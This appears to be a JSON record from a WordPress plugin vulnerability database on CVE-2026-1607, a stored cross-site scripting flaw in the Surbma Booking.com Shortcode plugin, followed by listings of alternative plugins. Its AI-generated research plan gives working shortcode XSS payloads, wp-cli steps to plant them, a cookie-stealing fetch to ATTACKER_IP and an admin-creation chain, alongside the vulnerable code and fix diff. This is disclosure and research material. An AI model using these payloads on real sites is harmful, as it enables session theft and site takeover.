[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flVA0kWf1D2Go0ewUGB0JwlRbEHQTc_W_m4U4pTMO1bo":3,"$fqKSGvQ-gxzJHvYVB2ms614qaiNHK8ZEj1Mp_guKSN6M":234},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":13,"last_vuln_date":25,"fetched_at":26,"vulnerabilities":27,"developer":56,"crawl_stats":33,"alternatives":64,"analysis":186,"fingerprints":219},"surbma-bookingcom-shortcode","Surbma | Booking.com Shortcode","2.1.1","Surbma","https:\u002F\u002Fprofiles.wordpress.org\u002Fsurbma\u002F","\u003Cp>A simple shortcode to include Booking.com search box into WordPress. This is a very useful plugin if your user don’t have a permission to embed javascript in the content.\u003C\u002Fp>\n\u003Cp>The shortcode: \u003Ccode>[surbma-bookingcom param=\"ALL_THE_PARAMETERS\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cp>Where param is the parameter, you can find in the Booking.com embed code. You need to find the src field, where you have to copy all the parameters after the \u003Ccode>https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?\u003C\u002Fcode> url.\u003C\u002Fp>\n\u003Cp>You can find the parameters at the end of your Booking.com script’s url:\n    \u003C\u002Fp>\n","A simple shortcode to include Booking.com search box into WordPress.",10,1973,0,"2026-04-12T14:58:00.000Z","7.0","5.1","7.4",[19,20],"booking-com","shortcode","https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.1.1.zip",99,1,"2026-04-13 14:39:51","2026-04-16T10:56:18.058Z",[28],{"id":29,"url_slug":30,"title":31,"description":32,"plugin_slug":4,"theme_slug":33,"affected_versions":34,"patched_in_version":6,"severity":35,"cvss_score":36,"cvss_vector":37,"vuln_type":38,"published_date":25,"updated_date":39,"references":40,"days_to_patch":24,"patch_diff_files":42,"patch_trac_url":33,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":49,"research_vulnerable_code":50,"research_fix_diff":51,"research_exploit_outline":52,"research_model_used":53,"research_started_at":54,"research_completed_at":55,"research_error":33,"poc_status":33,"poc_video_id":33,"poc_summary":33,"poc_steps":33,"poc_tested_at":33,"poc_wp_version":33,"poc_php_version":33,"poc_playwright_script":33,"poc_exploit_code":33,"poc_has_trace":46,"poc_model_used":33,"poc_verification_depth":33},"CVE-2026-1607","surbma-bookingcom-authenticated-contributor-stored-cross-site-scripting-via-shortcode","Surbma | Booking.com \u003C= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=2.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 03:37:32",[41],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F01280afb-4745-4f36-823e-ed794bb3353a?source=api-prod",[43,44],"readme.txt","surbma-bookingcom-shortcode.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1607\n\n## 1. Vulnerability Summary\nThe **Surbma | Booking.com Shortcode** plugin (versions \u003C= 2.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the `surbma_bookingcom_shortcode_shortcode` function, which processes the `[surbma-bookingcom]` shortcode. The plugin accepts a user-defined attribute `param`, which is concatenated directly into a `\u003Cscript>` tag's `src` attribute without any sanitization or escaping (such as `esc_attr` or `esc_url`). This allows an attacker with Contributor-level permissions or higher to inject arbitrary HTML attributes or close the script tag entirely to execute malicious JavaScript.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard Gutenberg or Classic editor).\n- **Shortcode**: `[surbma-bookingcom]`\n- **Vulnerable Parameter**: `param`\n- **Authentication**: Required (Contributor role or higher). Contributor is the minimum role that can typically create posts and use shortcodes.\n- **Preconditions**: The plugin must be active. A user with the Contributor role must be able to save a post (even as a draft) and preview it, or an Administrator must view the published post.\n\n## 3. Code Flow\n1.  **Entry Point**: The shortcode is registered in `surbma-bookingcom-shortcode.php`:\n    ```php\n    add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n    ```\n2.  **Processing**: When a page containing the shortcode is rendered, WordPress calls `surbma_bookingcom_shortcode_shortcode($atts)`:\n    ```php\n    function surbma_bookingcom_shortcode_shortcode( $atts ) {\n        extract( shortcode_atts( array(\n            \"param\" => ''\n        ), $atts ) ); \u002F\u002F $param is extracted from $atts['param']\n        return '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n    }\n    ```\n3.  **Sink**: The `$param` variable is concatenated directly into the return string. Because it is not passed through `esc_attr()` or `esc_url()`, characters like `\"` and `>` can be used to break out of the HTML attribute and tag context.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via the standard WordPress post creation\u002Fediting flow. It does **not** involve a custom AJAX or REST API endpoint provided by the plugin.\n- **Nonce Needed**: To create\u002Fsave a post as a Contributor, the standard WordPress `_wpnonce` for post creation is required.\n- **Acquisition**:\n    1.  The automated agent logs in as a Contributor.\n    2.  Navigate to `wp-admin\u002Fpost-new.php`.\n    3.  The `_wpnonce` is present in the page source (usually in the `wp.apiFetch` settings or a hidden input).\n    4.  The agent uses the standard `wp-cli` command `wp post create` to bypass the need for manual nonce handling during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that executes when an Administrator views the post.\n\n### Step-by-Step Plan:\n1.  **Inject via Post Creation**: Use `wp-cli` as a Contributor to create a post containing the malicious shortcode.\n2.  **Payload Selection**:\n    -   **Attribute Breakout**: `param=' \" onload=\"alert(origin)\" '`\n        -   Result: `\u003Cscript ... src=\"...html? \" onload=\"alert(origin)\" \">\u003C\u002Fscript>`\n    -   **Tag Breakout (Cleaner)**: `param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>'`\n        -   Result: `\u003Cscript ... src=\"...html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>`\n3.  **Trigger**: Navigate to the frontend URL of the newly created post while logged in as an Administrator.\n\n### HTTP Request Details (Simulating Preview\u002FSave):\nWhile `wp post create` is simpler, if testing the UI flow:\n- **URL**: `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fpost.php` (for existing) or `wp-admin\u002Fpost-new.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `post_title`: `XSS Test`\n    - `content`: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`\n    - `action`: `editpost`\n    - `post_type`: `post`\n    - `_wpnonce`: `[extracted_nonce]`\n\n## 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Post**: Create the post as the contributor.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Booking Search\" --post_content='[surbma-bookingcom param=\"\\\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\"]' --user=attacker\n    ```\n\n## 7. Expected Results\n- When the page is rendered, the HTML source should contain:\n  ```html\n  \u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>\n  ```\n- The browser should execute the `alert(origin)` call.\n\n## 8. Verification Steps\n1.  **Check Database Content**:\n    ```bash\n    wp post list --post_type=post --field=post_content | grep \"surbma-bookingcom\"\n    ```\n2.  **Verify Frontend Output**:\n    Use `http_request` to fetch the post URL and check for the unescaped script tag:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | xargs -n 1 wp post get --field=url | head -n 1)\n    # Check if the payload is present in the response\n    # (The agent will use browser_navigate and check for the alert)\n    ```\n\n## 9. Alternative Approaches\nIf `alert()` is blocked or hard to detect:\n- **Cookie Exfiltration**: `param='\">\u003C\u002Fscript>\u003Cscript>fetch(\"http:\u002F\u002FATTACKER_IP\u002F?c=\" + btoa(document.cookie))\u003C\u002Fscript>'`\n- **Admin User Creation**: If the target is an Administrator, inject a script that uses the REST API or `user-new.php` to create a new admin account (standard XSS-to-RCE\u002FAdmin chain).\n- **Attribute Injection**: Some browsers might behave differently with `src` attribute breakout. An alternative is `param=' \" onerror=\"alert(1)\" '` if the `src` URL fails to load, though `onload` is more reliable for `\u003Cscript>` tags if the `src` is valid. However, since we close the tag in the primary strategy, that remains the most robust method.","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `surbma-bookingcom` shortcode in versions up to 2.1. This occurs because the `param` attribute is concatenated directly into a script tag's source URL without sanitization or escaping, allowing authenticated contributors to inject arbitrary JavaScript.","\u002F\u002F surbma-bookingcom-shortcode.php lines 28-33\nfunction surbma_bookingcom_shortcode_shortcode( $atts ) {\n\textract( shortcode_atts( array(\n\t\t\"param\" => ''\n\t), $atts ) );\n\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n}\nadd_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php\t2020-02-10 13:24:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\t2026-04-12 14:58:34.000000000 +0000\n@@ -5,7 +5,7 @@\n Plugin URI: https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F\n Description: A simple shortcode to include Booking.com search box into WordPress.\n \n-Version: 2.0\n+Version: 2.1.1\n \n Author: Surbma\n Author URI: https:\u002F\u002Fsurbma.com\u002F\n@@ -17,20 +17,29 @@\n *\u002F\n \n \u002F\u002F Prevent direct access to the plugin\n-if ( !defined( 'ABSPATH' ) ) {\n-\tdie( 'Good try! :)' );\n-}\n+defined( 'ABSPATH' ) || exit;\n \n \u002F\u002F Localization\n-function surbma_bookingcom_shortcode_init() {\n+add_action( 'init', function() {\n \tload_plugin_textdomain( 'surbma-bookingcom-shortcode', false, dirname( plugin_basename( __FILE__ ) ) . '\u002Flanguages\u002F' );\n-}\n-add_action( 'plugins_loaded', 'surbma_bookingcom_shortcode_init' );\n+} );\n \n-function surbma_bookingcom_shortcode_shortcode( $atts ) {\n-\textract( shortcode_atts( array(\n-\t\t\"param\" => ''\n-\t), $atts ) );\n-\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n-}\n-add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n+add_shortcode( 'surbma-bookingcom', function( $atts ) {\n+\t$atts = shortcode_atts(\n+\t\tarray(\n+\t\t\t'param' => '',\n+\t\t),\n+\t\t$atts,\n+\t\t'surbma-bookingcom'\n+\t);\n+\n+\t$param = isset( $atts['param'] ) ? $atts['param'] : '';\n+\t$param = is_string( $param ) ? wp_strip_all_tags( $param ) : '';\n+\n+\t$url = 'https:\u002F\u002Fwww.booking.com\u002Fgeneral.html';\n+\tif ( '' !== $param ) {\n+\t\t$url .= '?' . rawurlencode( $param );\n+\t}\n+\n+\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"' . esc_url( $url, array( 'https' ) ) . '\">\u003C\u002Fscript>';\n+} );","1. Authenticate to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or page via the WordPress editor.\n3. Insert the `[surbma-bookingcom]` shortcode into the post content, supplying a malicious payload in the `param` attribute. A working payload uses HTML tag breakout: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`.\n4. Save the post as a draft or publish it.\n5. When an administrator or any other site visitor views the post, the browser will interpret the closing `\">\u003C\u002Fscript>` sequence, terminate the original Booking.com script tag, and execute the subsequent injected `\u003Cscript>` block.","gemini-3-flash-preview","2026-04-16 15:59:00","2026-04-16 15:59:21",{"slug":57,"display_name":7,"profile_url":8,"plugin_count":58,"total_installs":59,"avg_security_score":60,"avg_patch_time_days":61,"trust_score":62,"computed_at":63},"surbma",28,30210,91,95,73,"2026-04-18T19:27:10.466Z",[65,91,117,140,163],{"slug":66,"name":67,"version":68,"author":69,"author_profile":70,"description":71,"short_description":72,"active_installs":73,"downloaded":74,"rating":75,"num_ratings":76,"last_updated":77,"tested_up_to":78,"requires_at_least":79,"requires_php":80,"tags":81,"homepage":86,"download_link":87,"security_score":88,"vuln_count":89,"unpatched_count":13,"last_vuln_date":90,"fetched_at":26},"shortcodes-ultimate","WP Shortcodes Plugin — Shortcodes Ultimate","7.5.0","Vova","https:\u002F\u002Fprofiles.wordpress.org\u002Fgn_themes\u002F","\u003Ch3>SHORTCODES ULIMATE – THE #1 SHORTCODES PLUGIN\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=description\" rel=\"nofollow ugc\">Shortcodes Ultimate\u003C\u002Fa> is a huge collection of useful elements, that you can use in the post editor, text widgets or even in template files.\u003C\u002Fp>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F507942335\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fdocs-category\u002Fshortcodes\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=features\" rel=\"nofollow ugc\">Over 50 gorgeous shortcodes\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Insert shortcodes in 1 click with Live Preview\u003C\u002Fli>\n\u003Cli>Supports the Block Editor\u003C\u002Fli>\n\u003Cli>Seamlessly integrates with your theme\u003C\u002Fli>\n\u003Cli>Looks great on mobile devices\u003C\u002Fli>\n\u003Cli>Custom CSS editor is included\u003C\u002Fli>\n\u003Cli>Developer-friendly with plenty of hooks and extensive documentation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Included shortcodes\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Posts\u003C\u002Fstrong> – allows you to show specific posts anywhere\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Accordion\u003C\u002Fstrong> – simple toggle block to show\u002Fhide your content\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Button\u003C\u002Fstrong> – highly-customizable button with multiple styles\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lightbox\u003C\u002Fstrong> – a lightbox that you can use with virtually any element\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Image Carousel\u003C\u002Fstrong> – beautiful super-customizable image carousel\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Columns\u003C\u002Fstrong> – must-have tool for creating layouts\u003C\u002Fli>\n\u003Cli>And many more…\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Get Help\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fdocs\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=links-docs\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fshortcodes-ultimate\" rel=\"ugc\">Community Support Forum\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fsupport\u002Fopen-support-ticket\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=links-support\" rel=\"nofollow ugc\">The Pro Support\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TRY THE PRO VERSION FOR FREE\u003C\u002Fh3>\n\u003Cp>Try Shortcodes Ultimate Pro risk-free for 30 days. You are fully protected by our no questions asked refund policy!\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fpricing\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=try-pro\" rel=\"nofollow ugc\">Upgrade to Pro\u003C\u002Fa>\u003C\u002Fp>\n","A comprehensive collection of visual components for your site",400000,24750356,98,5919,"2026-03-23T19:21:00.000Z","6.9.4","5.0","5.4",[82,83,84,20,85],"carousel","columns","posts","toggle","https:\u002F\u002Fgetshortcodes.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.5.0.zip",88,36,"2026-04-15 14:02:54",{"slug":92,"name":93,"version":94,"author":95,"author_profile":96,"description":97,"short_description":98,"active_installs":99,"downloaded":100,"rating":101,"num_ratings":102,"last_updated":103,"tested_up_to":104,"requires_at_least":105,"requires_php":106,"tags":107,"homepage":112,"download_link":113,"security_score":114,"vuln_count":115,"unpatched_count":13,"last_vuln_date":116,"fetched_at":26},"mw-wp-form","MW WP Form","5.1.2","Webの相談所","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebsoudan\u002F","\u003Cp>\u003Cstrong>This plugin currently has only the minimum required maintenance releases.\u003C\u002Fstrong>\u003Cbr \u002F>\n\u003Cstrong>Main maintainer has been handed over from @inc2734 to @websoudan.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>MW WP Form can create mail form with a confirmation screen using shortcode.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Form created using shortcodes\u003C\u002Fli>\n\u003Cli>Using confirmation page is possible.\u003C\u002Fli>\n\u003Cli>The page changes by the same URL or individual URL are possible.\u003C\u002Fli>\n\u003Cli>Many validation rules\u003C\u002Fli>\n\u003Cli>Saving inquiry data is possible.\u003C\u002Fli>\n\u003Cli>Displaying Chart using saved inquiry data is possible.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Official\u003C\u002Fh4>\n\u003Cp>https:\u002F\u002Fmw-wp-form.web-soudan.co.jp\u003C\u002Fp>\n\u003Ch4>GitHub\u003C\u002Fh4>\n\u003Cp>https:\u002F\u002Fgithub.com\u002Fweb-soudan\u002Fmw-wp-form\u003C\u002Fp>\n\u003Ch4>The following third-party resources\u003C\u002Fh4>\n\u003Cp>Google Charts\u003Cbr \u002F>\nSource: https:\u002F\u002Fdevelopers.google.com\u002Fchart\u002F\u003C\u002Fp>\n\u003Ch4>Contributors\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002F2inc.org\" rel=\"nofollow ugc\">Takashi Kitajima\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Finc2734\" rel=\"nofollow ugc\">inc2734\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwebcre-archive.com\" rel=\"nofollow ugc\">Ryujiro Yamamoto\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fryu263\" rel=\"nofollow ugc\">ryu263\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"http:\u002F\u002Fkee-non.com\" rel=\"nofollow ugc\">Tsujimoto Tomoyuki\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Ftomothumb\" rel=\"nofollow ugc\">tomothumb\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>[Naoyuki Ohata] ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnanniku\" rel=\"nofollow ugc\">nanniku\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fmt8.biz\u002F\" rel=\"nofollow ugc\">Kazuto Takeshita\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmt8biz\u002F\" rel=\"nofollow ugc\">moto hachi\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.next-season.net\u002F\" rel=\"nofollow ugc\">Atsushi Ando\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnext-season\u002F\" rel=\"nofollow ugc\">NExt-Season\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fvisualive.jp\u002F\" rel=\"nofollow ugc\">Kazuki Tomiyasu\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fkuck1u\u002F\" rel=\"nofollow ugc\">KUCKLU\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fmypacecreator.net\u002F\" rel=\"nofollow ugc\">Kei Nomura\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmypacecreator\u002F\" rel=\"nofollow ugc\">mypacecreator\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmh35\" rel=\"nofollow ugc\">mh35\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fnojimage\" rel=\"nofollow ugc\">Takashi Nojima\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fherikutu\" rel=\"nofollow ugc\">herikutu\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ftsucharoku\" rel=\"nofollow ugc\">tsucharoku\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ft-hamano\" rel=\"nofollow ugc\">Tetsuaki Hamano\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fwildworks\u002F\" rel=\"nofollow ugc\">t-hamano\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fmusus\" rel=\"nofollow ugc\">Susumu Seino\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmusus\u002F\" rel=\"nofollow ugc\">Susumu Seino\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Flikr\" rel=\"nofollow ugc\">Yosuke Onoue\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Flikr\u002F\" rel=\"nofollow ugc\">likr\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fyudai524\" rel=\"nofollow ugc\">Yudai Konishi\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fyudai524\u002F\" rel=\"nofollow ugc\">Yudai Konishi\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fnoldorinfo\" rel=\"nofollow ugc\">takekoshi\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnoldorinfo\u002F\" rel=\"nofollow ugc\">takekoshi\u003C\u002Fa> )\u003C\u002Fli>\n\u003C\u002Ful>\n","MW WP Form is shortcode base contact form plugin. This plugin have many features. For example you can use many validation rules, inquiry data saving,  &hellip;",200000,1824930,84,23,"2026-04-08T02:35:00.000Z","6.4.8","6.0","8.0",[108,109,110,111,20],"confirm","form","mail","preview","https:\u002F\u002Fmw-wp-form.web-soudan.co.jp","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmw-wp-form.5.1.2.zip",83,7,"2026-04-08 07:57:15",{"slug":118,"name":119,"version":120,"author":121,"author_profile":122,"description":123,"short_description":124,"active_installs":125,"downloaded":126,"rating":75,"num_ratings":127,"last_updated":128,"tested_up_to":78,"requires_at_least":129,"requires_php":130,"tags":131,"homepage":136,"download_link":137,"security_score":75,"vuln_count":138,"unpatched_count":13,"last_vuln_date":139,"fetched_at":26},"shortcoder","Shortcoder — Create Shortcodes for Anything","6.5.2","vaakash","https:\u002F\u002Fprofiles.wordpress.org\u002Fvaakash\u002F","\u003Cp>Shortcoder plugin allows to create a custom shortcodes for HTML, JavaScript, CSS and other code snippets. Now the shortcodes can be used in posts\u002Fpages and the snippet will be replaced in place.\u003C\u002Fp>\n\u003Ch3>✍ Create shortcodes easily\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Give a name for the shortcode\u003C\u002Fli>\n\u003Cli>Paste the HTML\u002FJavaScript\u002FCSS as shortcode content\u003C\u002Fli>\n\u003Cli>Save !\u003C\u002Fli>\n\u003Cli>Now insert the shortcode \u003Ccode>[sc name=\"my_shortcode\"]\u003C\u002Fcode> in your post\u002Fpage.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Voila !\u003C\u002Fstrong> You got the HTML\u002FJavascript\u002FCSS in your post.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>✨ Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Create \u003Cstrong>custom shortcodes\u003C\u002Fstrong> easily and use them in any place where shortcode is supported.\u003C\u002Fli>\n\u003Cli>Have any \u003Cstrong>HTML\u003C\u002Fstrong>, \u003Cstrong>Javascript\u003C\u002Fstrong>, \u003Cstrong>CSS\u003C\u002Fstrong> as Shortcode content.\u003C\u002Fli>\n\u003Cli>Insert: \u003Cstrong>Custom parameters\u003C\u002Fstrong> in shortcode\u003C\u002Fli>\n\u003Cli>Insert: \u003Cstrong>WordPress parameters\u003C\u002Fstrong> in shortcode\u003C\u002Fli>\n\u003Cli>Multiple editors: Code, Visual and text modes.\u003C\u002Fli>\n\u003Cli>Globally disable the shortcode when not needed.\u003C\u002Fli>\n\u003Cli>Disable shortcode on desktop, mobile devices.\u003C\u002Fli>\n\u003Cli>A button in post editor to pick the shortcodes to insert.\u003C\u002Fli>\n\u003Cli>Execute blocks HTML in shortcode content.\u003C\u002Fli>\n\u003Cli>Insert shortcodes in Gutenberg\u002Fblock editor.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎲 An example usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Create a shortcode named “adsenseAd” in the Shortcoder admin page.\u003C\u002Fli>\n\u003Cli>Paste the adsense code in the box given and save it.\u003C\u002Fli>\n\u003Cli>Use \u003Ccode>[sc name=\"adsenseAd\"]\u003C\u002Fcode> in your posts and pages.\u003C\u002Fli>\n\u003Cli>Tada !!! the ad code is replaced and it appears in the post.\u003C\u002Fli>\n\u003Cli>Now you can edit the ad code at one place and the code is updated in all the locations where the shortcode is used.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Similarly shortcodes can be created for frequently used snippets.\u003C\u002Fp>\n\u003Cp>You can also add \u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">custom parameters\u003C\u002Fa> (like \u003Ccode>%%id%%\u003C\u002Fcode>) inside the snippets, and change it’s value like \u003Ccode>[sc name=\"youtube\" id=\"GrlRADfvjII\"]\u003C\u002Fcode> when using them.\u003C\u002Fp>\n\u003Ch3>🧱 Using in block editor\u003C\u002Fh3>\n\u003Cp>Though shortcodes can be used in \u003Cstrong>any\u003C\u002Fstrong> place manually, Shortcoder provides below options to select and insert the shortcodes created easily when working with the block editor.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Shortcoder block\u003C\u002Fli>\n\u003Cli>Toolbar button to select and insert shortcodes inline (under “more”)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>💎 Upgrade to PRO\u003C\u002Fh3>\n\u003Cp>Shortcoder also provides a \u003Ca 